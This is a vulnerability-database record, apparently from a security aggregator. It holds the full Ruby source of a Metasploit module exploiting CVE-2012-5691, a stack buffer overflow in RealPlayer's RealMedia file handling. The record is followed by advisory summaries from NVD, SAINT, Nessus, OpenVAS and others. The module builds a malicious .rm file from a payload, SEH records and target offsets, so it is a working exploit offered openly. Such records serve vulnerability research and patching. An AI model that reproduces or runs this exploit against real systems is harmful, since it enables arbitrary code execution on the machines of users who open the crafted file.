RealPlayer RealMedia File Handling Buffer Overflow

{"bulletinFamily": "exploit", "id": "EDB-ID:23694", "cvelist": ["CVE-2012-5691"], "modified": "2012-12-27T00:00:00", "lastseen": "2016-02-02T21:35:25", "edition": 1, "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\r\n\t\t\t\tThe vulnerability exists in the handling of real media files, due to the insecure\r\n\t\t\t\tusage of the GetPrivateProfileString function to retrieve the URL property from an\r\n\t\t\t\tInternetShortcut section.\r\n\r\n\t\t\t\tThis module generates a malicious rm file which must be opened with RealPlayer via\r\n\t\t\t\tdrag and drop or double click methods. It has been tested successfully on Windows\r\n\t\t\t\tXP SP3 with RealPlayer 15.0.5.109.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-5691' ],\r\n\t\t\t\t\t[ 'OSVDB', '88486' ],\r\n\t\t\t\t\t[ 'BID', '56956' ],\r\n\t\t\t\t\t[ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => 'process'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 2000\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 / Real Player 15.0.5.109',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll\r\n\t\t\t\t\t\t\t'OffsetOne' => 2312, # Open via double click\r\n\t\t\t\t\t\t\t'OffsetTwo' => 2964 # Open via drag and drop\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Dec 14 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = payload.encoded\r\n\t\tbuffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetOne'] + 8}\").encode_string\r\n\t\tbuffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetTwo'] + 8}\").encode_string\r\n\t\tbuffer << rand_text(7000) # Generate exception\r\n\r\n\t\tcontent = \"[InternetShortcut]\\nURL=\"\r\n\t\tfilecontent = content+buffer\r\n\r\n\t\tfile_create(filecontent)\r\n\r\n\tend\r\nend", "published": "2012-12-27T00:00:00", "href": "https://www.exploit-db.com/exploits/23694/", "osvdbidlist": ["88486"], "reporter": "metasploit", "hash": "1613bd8c111f3081a1525ecb9fa1302caa66a6dd23ec471d2c05520666fc6046", "title": "RealPlayer RealMedia File Handling Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "RealPlayer RealMedia File Handling Buffer Overflow. CVE-2012-5691. Remote exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23694/", "viewCount": 1, "enchantments": {"vulnersScore": 2.6}}

{"result": {"cve": [{"id": "CVE-2012-5691", "type": "cve", "title": "CVE-2012-5691", "description": "Buffer overflow in RealNetworks RealPlayer before 16.0.0.282 and RealPlayer SP 1.0 through 1.1.5 allows remote attackers to execute arbitrary code via a crafted RealMedia file.", "published": "2012-12-19T06:55:56", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5691", "cvelist": ["CVE-2012-5691"], "lastseen": "2016-09-03T17:18:23"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/REAL_PLAYER_URL_PROPERTY_BOF", "type": "metasploit", "title": "CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow ", "description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.", "published": "2012-12-25T17:05:10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/real_player_url_property_bof", "cvelist": ["CVE-2012-5691"], "lastseen": "2017-06-05T14:26:52"}], "saint": [{"id": "SAINT:5492286976494AC66570E89A02490D40", "type": "saint", "title": "RealPlayer InternetShortcut URL property buffer overflow", "description": "Added: 01/07/2013 \nCVE: [CVE-2012-5691](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5691>) \nBID: [56956](<http://www.securityfocus.com/bid/56956>) \nOSVDB: [88486](<http://www.osvdb.org/88486>) \n\n\n### Background\n\nRealPlayer is a media player application which can play back various multimedia file formats. \n\n### Problem\n\nA buffer overflow vulnerability in the `**GetPrivateProfileString**` function allows command execution when a user opens a RealMedia file containing a specially crafted URL property in the InternetShortcut section. \n\n### Resolution\n\nUpgrade to RealPlayer 16.0.0.282 or higher. \n\n### References\n\n<http://service.real.com/realplayer/security/12142012_player/en/> \n\n\n### Limitations\n\nExploit works on RealPlayer 15.0.6.14 on Windows XP SP3 English (DEP OptIn) and requires a user to download the exploit file and drag it into RealPlayer. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-01-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/realplayer_internetshortcut_url", "cvelist": ["CVE-2012-5691"], "lastseen": "2016-10-03T15:01:53"}, {"id": "SAINT:2D55402540E7F0A0A61D0CFA975C0220", "type": "saint", "title": "RealPlayer InternetShortcut URL property buffer overflow", "description": "Added: 01/07/2013 \nCVE: [CVE-2012-5691](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5691>) \nBID: [56956](<http://www.securityfocus.com/bid/56956>) \nOSVDB: [88486](<http://www.osvdb.org/88486>) \n\n\n### Background\n\nRealPlayer is a media player application which can play back various multimedia file formats. \n\n### Problem\n\nA buffer overflow vulnerability in the `**GetPrivateProfileString**` function allows command execution when a user opens a RealMedia file containing a specially crafted URL property in the InternetShortcut section. \n\n### Resolution\n\nUpgrade to RealPlayer 16.0.0.282 or higher. \n\n### References\n\n<http://service.real.com/realplayer/security/12142012_player/en/> \n\n\n### Limitations\n\nExploit works on RealPlayer 15.0.6.14 on Windows XP SP3 English (DEP OptIn) and requires a user to download the exploit file and drag it into RealPlayer. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-01-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/realplayer_internetshortcut_url", "cvelist": ["CVE-2012-5691"], "lastseen": "2016-12-14T16:58:03"}, {"id": "SAINT:F139377CFA4FD0DA72C85AD8185F9BFC", "type": "saint", "title": "RealPlayer InternetShortcut URL property buffer overflow", "description": "Added: 01/07/2013 \nCVE: [CVE-2012-5691](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5691>) \nBID: [56956](<http://www.securityfocus.com/bid/56956>) \nOSVDB: [88486](<http://www.osvdb.org/88486>) \n\n\n### Background\n\nRealPlayer is a media player application which can play back various multimedia file formats. \n\n### Problem\n\nA buffer overflow vulnerability in the `**GetPrivateProfileString**` function allows command execution when a user opens a RealMedia file containing a specially crafted URL property in the InternetShortcut section. \n\n### Resolution\n\nUpgrade to RealPlayer 16.0.0.282 or higher. \n\n### References\n\n<http://service.real.com/realplayer/security/12142012_player/en/> \n\n\n### Limitations\n\nExploit works on RealPlayer 15.0.6.14 on Windows XP SP3 English (DEP OptIn) and requires a user to download the exploit file and drag it into RealPlayer. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-01-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/realplayer_internetshortcut_url", "cvelist": ["CVE-2012-5691"], "lastseen": "2017-01-10T14:03:44"}], "seebug": [{"id": "SSV-77444", "type": "seebug", "title": "RealPlayer RealMedia File Handling Buffer Overflow", "description": "Summary: \nRealPlayer is Real Networks company publishing and maintenance of a software package that can be used to play Real Media encoding format of the multimedia file.< br/>RealNetworks RealPlayer 16.0.0.282 the previous version and RealPlayer SP 1. 0 to 1. 1. 5 version in the presence of buffer overflow vulnerabilities. Via a specially crafted RealMedia file, a remote attacker exploit the vulnerability to execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-77444", "cvelist": ["CVE-2012-5691"], "lastseen": "2016-07-28T20:56:55"}], "packetstorm": [{"id": "PACKETSTORM:119134", "type": "packetstorm", "title": "RealPlayer RealMedia File Handling Buffer Overflow", "description": "", "published": "2012-12-28T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/119134/RealPlayer-RealMedia-File-Handling-Buffer-Overflow.html", "cvelist": ["CVE-2012-5691"], "lastseen": "2016-12-05T22:18:43"}], "nessus": [{"id": "REALPLAYER_16_0_0_282.NASL", "type": "nessus", "title": "RealPlayer for Windows < 16.0.0.282 Multiple Vulnerabilities", "description": "According to its build number, the installed version of RealPlayer on the remote Windows host is earlier than 16.0.0.282. It is, therefore, affected by multiple vulnerabilities :\n\n - An error exists related to 'RealAudio' handling and invalid pointers that can allow arbitrary code execution. (CVE-2012-5690)\n\n - An error exists related to 'RealMedia' handling that can allow a buffer overflow leading to arbitrary code execution. (CVE-2012-5691)", "published": "2012-12-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=63289", "cvelist": ["CVE-2012-5690", "CVE-2012-5691"], "lastseen": "2016-12-10T05:38:16"}], "openvas": [{"id": "OPENVAS:803088", "type": "openvas", "title": "RealNetworks RealPlayer Code Execution Vulnerabilities - Dec12 (Windows)", "description": "This host is installed with RealPlayer which is prone to multiple\n code execution vulnerabilities.", "published": "2012-12-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803088", "cvelist": ["CVE-2012-5690", "CVE-2012-5691"], "lastseen": "2017-05-05T06:29:11"}]}}